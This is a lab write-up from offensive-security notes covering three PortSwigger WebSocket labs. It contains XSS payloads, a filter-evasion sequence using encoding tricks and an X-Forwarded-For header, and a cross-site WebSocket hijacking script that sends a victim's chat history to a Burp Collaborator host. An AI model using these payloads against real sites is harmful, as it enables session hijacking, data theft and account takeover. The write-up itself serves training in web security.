> For the complete documentation index, see [llms.txt](https://cel1s0.gitbook.io/offsec-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://cel1s0.gitbook.io/offsec-notes/portswigger-academy/client-side-topics/testing-for-websockets-security-vulnerabilities.md).

# Testing for WebSockets security vulnerabilities

### Lab: Manipulating WebSocket messages to exploit vulnerabilities

This online shop has a live chat feature implemented using WebSockets. Chat messages that you submit are viewed by a support agent in real time.

`/chat` **-> Live chat**

```
→ To server
{"message":"test"}
← To client
{"user":"You","content":"test"}
```

There is just client side protection with html encoding.

Send the request to the repeater -> Reconnect -> Send this payload:

```
{"message":"<img src=1 onerror='alert(1)'>"}
```

### Lab: Manipulating the WebSocket handshake to exploit vulnerabilities

This online shop has a live chat feature implemented using WebSockets. It has an aggressive but flawed XSS filter.

`/chat` **-> Live chat**

```
→ To server
{"message":"<img onclick='alert(1)'>test</img>"}
← To client
{"error":"Attack detected: Event handler"}

→ To server
{"message":"<iframe src='javascript:alert(0)'>"}
← To client
{"error":"Attack detected: JavaScript"}

→ To server
{"message":"<iframe src='javascRipt:alert(0)'>"}
← To client
{"error":"Attack detected: Alert"}

→ To server
{"message":"<iframe src='javascRipt:%61lert(0)'>"}
a -> url encoded
```

To bypass being in blacklist, we can add this header to request header:&#x20;

`X-Forwarded-For: (any value)`

### Lab: Cross-site WebSocket hijacking

This online shop has a live chat feature implemented using WebSockets.

To solve the lab, use the exploit server to host an HTML/JavaScript payload that uses a cross-site WebSocket hijacking attack to exfiltrate the victim's chat history, then use this gain access to their account.

```
Request:
GET /chat HTTP/1.1
Host: acf21faf1e293867c0fd365700a700f3.web-security-academy.net
Connection: Upgrade
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Upgrade: websocket
Origin: https://acf21faf1e293867c0fd365700a700f3.web-security-academy.net
Sec-WebSocket-Version: 13
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=0eUxfWHWU1z3UUKb9xAUqwNhI0jPJe5f
Sec-WebSocket-Key: kLHi+hZ7ECII+qRH3585hQ==

Response:
HTTP/1.1 101 Switching Protocol
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: GQ79sfJLT+ljrMNywxhuWRsOD8Q=
Content-Length: 0

<form id="chatForm" action="wss://acf21faf1e293867c0fd365700a700f3.web-security-academy.net/chat">
```

There is no csrf protection in websocket handshake.

**Exploit Server ->**

```
Body:

  <script>
    var ws = new WebSocket('wss://acf21faf1e293867c0fd365700a700f3.web-security-academy.net/chat');
    ws.onopen = function() {
      ws.send("READY");
    };
    ws.onmessage = function(event) {
      fetch('https://gtdks02v6yt40r756at6r1o59wfm3b.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body: event.data});
    };
  </script>
```

```
Collaborator:

{"user":"Hal Pline","content":"No problem carlos, it's dqpl6qi78qaekjz7wh6d"}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cel1s0.gitbook.io/offsec-notes/portswigger-academy/client-side-topics/testing-for-websockets-security-vulnerabilities.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.